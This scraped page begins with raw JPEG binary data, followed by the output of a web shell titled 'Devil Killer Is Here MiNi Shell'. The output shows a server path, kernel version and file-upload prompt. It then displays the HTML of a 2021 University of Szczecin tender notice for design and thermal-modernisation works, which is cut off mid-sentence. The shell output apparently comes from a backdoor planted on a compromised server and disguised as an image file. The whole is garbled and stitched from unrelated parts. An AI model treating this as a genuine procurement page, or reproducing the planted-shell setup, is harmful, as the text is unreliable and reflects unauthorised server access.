JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211018/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211018/0023533103-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> wykonanie usług architektonicznych i inżynieryjnych w zakresie projektowania oraz robót budowlanych dla inwestycji termomodernizacji budynków części A, B, C ,D ,E ,F ,G Uniwersytetu Szczecińskiego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Uniwersytet Szczeciński</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001208777</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">al. Papieża Jana Pawła II nr 22A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szczecin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">70-453</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL424 - Miasto Szczecin</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">91 444 11 51</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@usz.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://usz.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> wykonanie usług architektonicznych i inżynieryjnych w zakresie projektowania oraz robót budowlanych dla inwestycji termomodernizacji budynków części A, B, C ,D ,E ,F ,G Uniwersytetu Szczecińskiego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-fc169fa4-300a-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00235331</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">03</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00037715/11/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">2.1.5 Prace inwestycyjne w ramach termomodernizacji Kampusu ul. Krakowska, Cukrowa (bud. A, B, C, D , E, f, G )</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> &#34;Termomodernizacja Kampusu Uniwersytetu Szczecińskiego przy ul. Cukrowej i Krakowskiej w Szczecinie zgodnie z umową o dofinansowanie nr POIS.01.03.01-00-0050/17-00 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/usz <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/usz</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Środkiem<br/>komunikacji elektronicznej w niniejszym postępowaniu jest:a) Platforma, dostępna pod adresem<br/>https://platformazakupowa.pl/pn/usz i formularz Wyślij wiadomość (dostępny na stronie<br/>postępowania).Uwaga! Komunikat Wyślij wiadomość nie służy do składania ofert. b)<br/>przetargi@usz.edu.pl w sytuacjach awaryjnych np. nie działania Platformy. Zamawiający nie<br/>przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków<br/>komunikacji elektronicznej.2. Zaleca się, aby komunikacja z Wykonawcami odbywała się tylko na<br/>Platformie, a nie za pośrednictwem email.3. Wymagania techniczne i organizacyjne wysyłania i<br/>odbierania dokumentów elektronicznych opisane zostały w Regulaminie Platformy.4. Maksymalny<br/>rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy na Platformie został podany<br/>w instrukcji dla Wykonawców.5. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień<br/>oraz informacji przyjmuje się datę ich przesłania za pośrednictwem Platformy poprzez kliknięcie<br/>przycisku „Wyślij wiadomość”, po którym pojawi się komunikat, że wiadomość została wysłana do<br/>Zamawiającego.6. Zamawiający rekomenduje przesyłanie danych w formatach dopuszczalnych<br/>odpowiednimi przepisami prawa: .pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf.W celu<br/>ewentualnej kompresji danych Zamawiający rekomenduje wykorzystywanie jednego z formatów:<br/>.zip.7Z.7. Zamawiający zaleca aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju. Podpisywanie różnymi rodzajami podpisów np. osobistym i<br/>kwalifikowanym może doprowadzić do problemów w weryfikacji plików.8. Oświadczenie na podstawie<br/>art. 125 ust. 1 składa się pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej<br/>opatrzonej podpisem kwalifikowanym, podpisem zaufanym lub podpisem osobistym.9. Ofertę składa<br/>się pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>kwalifikowanym, podpisem zaufanym lub podpisem osobistym.10. Forma dokumentów zgodnie z<br/>Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania<br/>i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">A-ZP.381.124.2021.WB</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> wykonanie usług architektonicznych i inżynieryjnych w zakresie projektowania oraz robót<br/>budowlanych dla inwestycji termomodernizacji budynków części A, B, C ,D ,E ,F ,G<br/>Uniwersytetu Szczecińskiego w ramach projektu &#34;Termomodernizacja Kampusu Uniwersytetu<br/>Szczecińskiego przy ul. Cukrowej i Krakowskiej w Szczecinie zgodnie z umową o<br/>dofinansowanie nr POIS.01.03.01-00-0050/17-00 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71200000-0 - Usługi architektoniczne i podobne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">420 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował<br/>następującymi kryteriami i ich wagami oraz w następujący sposób będzie oceniał spełnianie kryteriów:<br/>􀀀 cena brutto - 60 %<br/>􀀀 gwarancja i rękojmia - 20 %<br/>􀀀 termin wykonania - 20 %<br/>2. Sposób oceny ofert według przyjętych kryteriów (1%=1pkt):</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja i rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> zdolności technicznej lub zawodowej:<br/>Minimalny poziom zdolności:<br/>Zamawiający uzna, że Wykonawca posiada wymagane zdolności zawodowe zapewniające<br/>należyte wykonanie zamówienia, jeżeli wykonawca wykaże, że wykonał należycie w okresie<br/>pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie co najmniej<br/>a) dwie roboty budowlane o wartości co najmniej 10,000.000,00 zł brutto każda, obejmujące<br/>wykonanie robót budowlanych wielobranżowych wraz z instalacjami i urządzeniami, polegające<br/>na budowie lub przebudowie lub rozbudowie budynku użyteczności publicznej, oraz<br/>b) jedną robotę budowlaną obejmującą budowę instalacji fotowoltaicznej o mocy nie mniejszej<br/>niż 100 KWP (w ramach jednej instalacji).<br/>Uwaga:<br/>W przypadku składania oferty wspólnej ww. warunek wykonawcy mogą spełniać łącznie<br/>Ponadto Zamawiający wymaga, by wykonawca wykazał, iż dysponuje lub będzie dysponował<br/>zespołem osób, które będą uczestniczyć w realizacji zamówienia, spełniających poniższe<br/>wymagania:<br/>􀀀 jedną osobą na stanowisko Projektant branży architektonicznej, spełniającą poniższe<br/>wymagania:- posiada uprawnienia do pełnienia samodzielnych funkcji technicznych w<br/>budownictwie, tj. do projektowania w specjalności architektonicznej bez ograniczeń;<br/>- w okresie ostatnich pięciu lat przed upływem terminu składania ofert, sprawowała funkcję<br/>głównego projektanta przy co najmniej dwóch projektach budowlanych obejmujących budowę,<br/>przebudowę lub rozbudowę budynku użyteczności publicznej bądź jego części o wartości robót<br/>budowlanych o wartości co najmniej 10,000.000,00 zł brutto. Uwaga: Zamawiający uwzględni<br/>jedynie zakończone projekty, w oparciu, o które uzyskano decyzję o pozwoleniu na użytkowanie;<br/>􀀀 jedną osobą na stanowisko Projektant branży konstrukcyjno–budowlanej, posiadającą<br/>uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie, tj. do<br/>projektowania w specjalności konstrukcyjno-budowlanej bez ograniczeń;<br/>􀀀 jedną osobą na stanowisko Projektant branży sanitarnej, posiadającą uprawnienia do<br/>pełnienia samodzielnych funkcji technicznych w budownictwie, tj. do projektowania w<br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,<br/>gazowych, wodociągowych i kanalizacyjnych bez ograniczeń;<br/>􀀀 jedną osobą na stanowisko Projektant branży elektrycznej i teletechnicznej, posiadającą<br/>uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie, tj. do<br/>projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i<br/>elektroenergetycznych i teletechnicznych bez ograniczeń;<br/>􀀀 jedną osobą na stanowisko Kierownik Budowy, spełniającą poniższe wymagania:<br/>- uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie, tj. do kierowania<br/>robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń, oraz<br/>- w okresie ostatnich pięciu lat przed upływem terminu składania ofert, pełniła samodzielną<br/>funkcję techniczną na stanowisku kierownika budowy na minimum dwóch zadaniach<br/>obejmujących wykonanie robót budowlanych o wartości co najmniej 10,000.000,00 zł brutto<br/>każda, polegających na budowie, przebudowie, rozbudowie lub remoncie obiektu kubaturowego;<br/>􀀀 jedną osobą na stanowisko Kierownik Robót branży sanitarnej, posiadającą uprawnienia do<br/>pełnienia samodzielnych funkcji technicznych w budownictwie, tj. do kierowania robotami<br/>budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych,<br/>wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń;<br/>􀀀 jedną osobą na stanowisko Kierownik Robót branży elektrycznej, spełniającą poniższe<br/>wymagania:<br/>- uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie, tj. do kierowania<br/>robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń<br/>elektrycznych i elektroenergetycznych bez ograniczeń, oraz<br/>- w okresie ostatnich pięciu lat przed upływem terminu składania ofert, pełniła samodzielną<br/>funkcję techniczną na stanowisku kierownika budowy lub kierownika robót na minimum jednym<br/>zadaniu obejmującym budowę instalacji fotowoltaicznej (w ramach jednego zadania) o mocy nie mniejszej niż 100 kWP<br/>􀀀 jedną osobą na stanowisko Rzeczoznawca ds. ochrony przeciwpożarowej, posiadającą<br/>uprawnienia do wykonywania funkcji rzeczoznawcy do spraw zabezpieczeń przeciwpożarowych,<br/>wpisaną na listę rzeczoznawców prowadzoną przez Komendanta Głównego Państwowej Straży<br/>Pożarnej, oraz minimum 36 miesięcznym doświadczeniem zawodowym (liczonym po uzyskaniu<br/>uprawnień /wpisu na właściwą listę);<br/>􀀀 jedną osobą na stanowisko Weryfikator założeń i rozwiązań projektowych, spełniającą<br/>poniższe wymagania:<br/>- uprawnienia do sporządzania świadectw charakterystyki energetycznej, tj. ujętą w wykazie<br/>osób uprawnionych do sporządzania świadectw charakterystyki energetycznej w centralnym<br/>rejestrze charakterystyki energetycznej budynków prowadzonym przez ministra właściwego do<br/>spraw budownictwa, oraz- posiada minimum 36 miesięczne doświadczenie w wykonywaniu<br/>świadectw charakterystyki energetycznej lub wykonywaniu modelowania energetycznego<br/>budynków (liczone po uzyskaniu uprawnień/wpisu na właściwą listę zawodową);<br/>Uwaga:<br/>W przypadku składania oferty wspólnej ww. warunek wykonawcy mogą spełniać łącznie<br/>Uwaga:<br/>1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które usługi/roboty budowlane wykonają poszczególni<br/>wykonawcy.<br/>2. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia<br/>wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają usługi/roboty budowlane, do realizacji<br/>których te zdolności są wymagane.<br/>3. Przez pojęcie przebudowy, remontu należy rozumieć definicje zawarte w ustawie z dnia 7<br/>lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2020 r. poz. 1333 ze zm.).<br/>4. Zamawiający nie dopuszcza, aby w ramach wykazywanego zespołu osób, które będą<br/>uczestniczyć w realizacji zamówienia Wykonawca wykazywał tą samą osobę do pełnienia<br/>dwóch i więcej funkcji.<br/>5. Osoby przewidziane do pełnienia samodzielnych funkcji technicznych w budownictwie muszą<br/>posiadać wymagane uprawnienia, które zostały wydane zgodnie z ustawą z dnia 7 lipca 1994 r.<br/>Prawo budowlane (t.j. Dz. U. z 2020 r. poz. 1333) dalej jako „ustawa Prawo budowlane”, w<br/>szczególności zgodnie z przepisem art. 12 ust. 1 pkt. 2, ust. 7, art. 12a lub uprawnienia<br/>uzyskane na podstawie przepisów obowiązujących przed wejściem w życie ustawy Prawo<br/>budowlane z 1994 r., natomiast w przypadku osób, które uzyskały uprawnienia w państwach<br/>członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państwach członkowskich<br/>Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stron umowy o Europejskim Obszarze<br/>Gospodarczym, posiadane uprawnienia muszą spełniać warunki określone w ustawie z dnia 18<br/>marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej. Osoby spoza terytorium Rzeczpospolitej Polskiej muszą się<br/>legitymować decyzją o uznaniu kwalifikacji zawodowych lub decyzją o prawie do świadczenia<br/>usług transgranicznych, wydanymi przez właściwe rady izby inżynierów, albo udokumentować,<br/>że zdały egzamin na uprawnienia budowlane przed właściwą Izbą.<br/>6. W przypadku, gdy jakakolwiek wartość dotycząca ww. warunków wyrażona będzie w walucie<br/>obcej, Zamawiający przeliczy tę wartość w oparciu o średni kurs walut NBP dla danej waluty z<br/>daty wszczęcia postępowania o udzielenie zamówienia publicznego (za datę wszczęcia<br/>postępowania Zamawiający uznaje datę zamieszczenia ogłoszenia o zamówieniu w Biuletynie<br/>Zamówień Publicznych). Jeżeli w tym dniu nie będzie opublikowany średni kurs NBP, zamawiający przyjmie kurs średni z ostatniej tabeli przed wszczęciem postępowania. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 PZP, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>b) oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 PZP, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o<br/>których mowa w art. 108 ust. 1 pkt 1-6 PZP, oraz w art. 109 ust. 1 pkt 5, 7-10 PZP (wzór - załącznik nr 5 do SWZ);</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">wykazu robót budowlanych wykonanych nie wcześniej niż w okresie<br/>ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem<br/>ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty<br/>(wzór -załącznik nr 4 do SWZ);<br/>wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami (wzór - załącznik nr 3 do SWZ).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający żąda złożenia wraz z ofertą następujących przedmiotowych środków dowodowych:<br/>a) w przypadku, gdy oferta obejmuje rozwiązania równoważne rozwiązaniom opisywanym w<br/>dokumentacji projektowej – PFU i Koncepcji w zakresie rozwiązań, materiałów, urządzeń, innych<br/>elementów, do oferty należy dołączyć ich zestawienie, zgodnie z załącznikiem nr 1a do SWZ<br/>(załącznikiem nr 1 do formularza oferty) wraz z dowodami świadczącymi o równoważności –<br/>zgodnie z wymaganiami określonymi w Rozdziale 1, Dział III pkt. 9 SWZ, z którego będzie wynikało, że oferowane roboty budowlane spełniają określone wymagania wskazane przez zamawiającego w dokumentacji projektowej – PFU i 